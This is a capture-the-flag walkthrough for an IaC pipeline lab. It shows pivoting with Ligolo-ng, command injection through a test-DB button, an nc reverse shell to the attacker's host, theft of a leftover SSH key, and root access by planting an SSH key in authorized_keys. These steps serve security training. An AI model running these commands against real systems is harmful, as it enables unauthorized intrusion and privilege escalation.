IaC Challenge
Now that you have learned how on-prem IaC deployments work and the security concerns that arise when using IaC.
In order for us to provide you with this challenge, a significant amount of software had to be kept at specific version levels. As such, the machine itself has some outdated software, which could be used with kernel exploits to bypass the challenge itself. However, if you choose to go this route of kernel exploitation to bypass the challenge and recover the flags, it will only affect your own learning opportunity. Our suggestion, try to solve the challenge by using what you have learned in this room about on-prem IaC.
Once the machine is booted, you can use SSH with the credentials below to connect to the machine:
Username | entry |
Password | entry |
IP | 10.10.64.200 |
Once authenticated, you will find the scripts for an IaC pipeline. Work through these files to identify vulnerabilities and attack the machines deployed by the IaC pipeline to gain full control of the pipeline ultimately! You can also use this SSH connection to "catch shells" as required. You will have to leverage these files with what you learned in Building an On-Prem IaC Workflow to compromise the pipeline!
To assist you on this journey, you can make use of the hints provided below. However, since the main goal is attacking an IaC pipeline, you are provided with the following:
Nmap has been installed for you on the host, allowing you to scan the port range of the Docker network if required.
Use SSH to proxy out the traffic of the web application, or any other port, as required.
You can use the SCP command of SSH to transfer out the IaC configuration files.
IP: 10.10.64.200
Let’s ping the machine to see if we’ve connected successfully.
ping -c3 10.10.64.200
Let’s connect to the machine now via SSH
.
ssh entry@10.10.64.200
Let’s now switch to a more stable bash shell.
bash
When we list the files we can see that there’s a folder named “iac” and in that we can see that there are multiple configuration files.
ls -la
Let’s now check the Vagrantfile.
cat Vagrantfile
Vagrant.configure("2") do |config|
# DB server will be the backend for our website
config.vm.define "dbserver" do |cfg|
# Configure the local network for the server
cfg.vm.network :private_network, type: "dhcp", docker_network__internal: true
cfg.vm.network :private_network, ip: "172.20.128.3", netmask: "24"
# Boot the Docker container and run Ansible
cfg.vm.provider "docker" do |d|
d.image = "mysql_vuln"
d.env = {
"MYSQL_ROOT_PASSWORD" => "mysecretpasswd"
}
end
end
# Webserver will be used to host our website
config.vm.define "webserver" do |cfg|
# Configure the local network for the server
cfg.vm.network :private_network, type: "dhcp", docker_network__internal: true
cfg.vm.network :private_network, ip: "172.20.128.2", netmask: "24"
# Link the shared folder with the hypervisor to allow data passthrough. Will remove later to harden
cfg.vm.synced_folder "./provision", "/tmp/provision"
cfg.vm.synced_folder "/home/ubuntu/", "/tmp/datacopy"
# Boot the Docker container and run Ansible
cfg.vm.provider "docker" do |d|
d.image = "ansible"
#d.cmd = ["ansible-playbook", "/tmp/provision/web-playbook.yml"]
d.has_ssh = true
# Command will keep the container active
d.cmd = ["/usr/sbin/sshd", "-D"]
end
#We will connect using SSH so override the defaults here
cfg.ssh.username = 'root'
cfg.ssh.private_key_path = "/home/ubuntu/iac/keys/id_rsa"
#Provision this machine using Ansible
cfg.vm.provision "shell", inline: "ansible-playbook /tmp/provision/web-playbook.yml"
end
end
So in the file, we can see that there are 2 VM’s one dbserver
is the backend for our website so we know that it’s running MySQL and we have the IP for it as well 172.20.128.3
. Then we have the webserver
which has the IP 172.20.128.2
. Now we know that both are internal VMs and we cannot directly use them or ping them.
But if we try to use curl on the internal machine we can see a response.
curl http://172.20.128.2/
Now we need to pivot to the network so there are multiple ways to do it for example SSH as this room suggests but we’ll be using Ligolo-ng
. it’s because for me this is the best pivoting tool available.
So let’s start with setting up the ligolo server
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
Now we’ll use the -selfcert
option so that the proxy server will use its certificates.
./proxy -selfcert
Now let’s set up a python server and transfer the agent file to the SSH machine.
python3 -m http.server 80
Now we move to the /tmp
directory as we have write permissions there and will call our file.
wget http://10.17.77.69/agent
Now let’s change the permission of the agent file and execute it.
chmod +x agent
./agent -connect 10.17.77.69:11601 -ignore-cert
Now if we check our proxy we can see that we got our connection there.
Now by doing ifconfig
we can see all the networks.
Let’s now copy the interface IP and let’s route them so that we can use it from our Kali machine as well.
sudo ip route add 172.20.128.0/24
Now we can start the tunnel on the proxy.
Now if we visit the webserver from our browser we can see that we’re able to see the webpage.
Now let’s start caido so we can proxy some of these.
caido
Now let’s refresh and check whether we can intercept the request in caido.
And yes we’re able to capture the requests.
Now if we look at the Sign In page we see that we have a button there labeled as (Dev) Test DB
.
We see that it’s showing us the version of MySQL let’s see what response are we able to see in caido.
We can see that it executes a command. so let’s try to execute different commands.
While testing the whoami
command we can see that it gives us a status code of 200 OK which means we’re able to execute the commands. If we see the Rendered image.
we can see that we’re executing commands as root user.
Now let’s try to take a reverse shell to the machine.
which nc
so we can use Netcat to catch a shell.
On our SSH shell we can start netcat.
nc -nvlp 1337
Now, moving on caido.
/bin/nc 10.10.205.253 1337 -e /bin/bash
Now let’s check our netcat shell.
Now if we list out the files we’re able to see our first flag.
ls -la
Flag: THM{Dev.Bypasses.and.Checks.can.be.Dangerous}
When a Vagrant deployment is performed, by default, Vagrant will create a local copy of the provisioning directory under the /vagrant/ folder. Have a look that and see if some sensitive information may have been left there.
We have a hint here that says to check the /vagrant folder so let’s check and see if we can find something to utilize.
cd /vagrant
The keys file looks promising.
we have the id_rsa key in this. let’s take it onto our kali machine and try to ssh on the dbserver
.
chmod 600 id_rsa
Now let’s SSH into the webserver
.
ssh root@172.20.128.2 -i id_rsa
and as we can see that we’re logged in as dbserver
.
ls -la
And we got our 2nd flag as well here.
Flag: THM{IaC.Deployment.Keys.Must.be.Removed}
Often times we need to transfer large amounts of data when deploying through an IaC pipeline. If we are a bit lazy, we might not restrict our shares or revoke them once we are done. Have a look at the provisioning shares.
Now we have another hint here. which means there must be a folder or shares to which we do have access mainly highlighting the provisioning
shares.
now if we look at the /tmp
directory we see there’s a folder named Datacopy
. which means the share that we talked about must be this one.
Now listing out all the files in datacopy
folder we can find our 3rd flag.
Flag: THM{IaC.Shares.Should.be.Restricted}
To perform provisioning in an IaC pipeline you need quite a bit of privileges. Often it is hard to determine exactly what privileges are needed, resulting in the permissions being too permissive.
We now have another hint. We cannot run entry
as root.
Now if we take a look back we have another user named ubuntu which might have all the access.
We can see all the files that we saw on the dbserver
shell as it’s a shared folder.
now if we somehow gain access as Ubuntu
our work is done.
doing ls -la
we found that there's a folder named .ssh
so if we try to put our ssh key in it. we can probably get our privileges escalated.
ls -la
So we have our ssh key here now let’s add that.
So we need to transfer our files into authorized_keys
file.
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCOI7BWKSZ4O6qBeC72lsjnz1TRwHyhh7A3Jvk6RC2830NsBIRhHsPROlVNnmMcgCyYhxNH1W4I5P2B2e165MNQbS/CzCNUSZojN3/sqwNJmRP9xGW0nzy9vO7Luypn1tNDibNA4NmbRlVfXNdIfk7OqjYAnWVJ42AZmqhNRgnjM4czpeRylp0vFDj2jaxYvf5muhE92FUEAbXD4CT6tNrfmGJlExH1PhOljg0AF5idLykhZfnY0Bdh7g6eo4LNtyqRGycH5w/bsqmbsuT1TuMa74xIRkjZHsoUMLuBfpC2+DUbLjXTguAvT8h+8coDmECTNjivkp5DnJRFh04sB9uIxgxb10UjqJL1kB+NyP8IYhYcVub4suAFdlBX/NtCZZvdFYDokc1KrHzJv/Zs0KWTkfOGL3KM4EpOYXe5RQ8EMidighMMDQckx7S5ZbYQ8423Dj3WJedLjoqmpyLdedUyR3CbiELe1CH2Ov1OUJ34vNZ268R4zTdKdULRA87pnq8= kali@kali" >> authorized_keys
Make sure to use “»” so that we do not overwrite the files.
cat authorized_keys
Now let’s ssh into the machine IP as Ubuntu.
ssh ubuntu@10.10.205.253
and we’re logged in. Now check for the sudoers permission.
sudo -l
We do not need any passwords to change permissions so let’s switch user to root.
sudo su
Now if we check our /root
folder we can find our final flag.
Flag: THM{Provisioners.Usually.Have.Privileged.Access}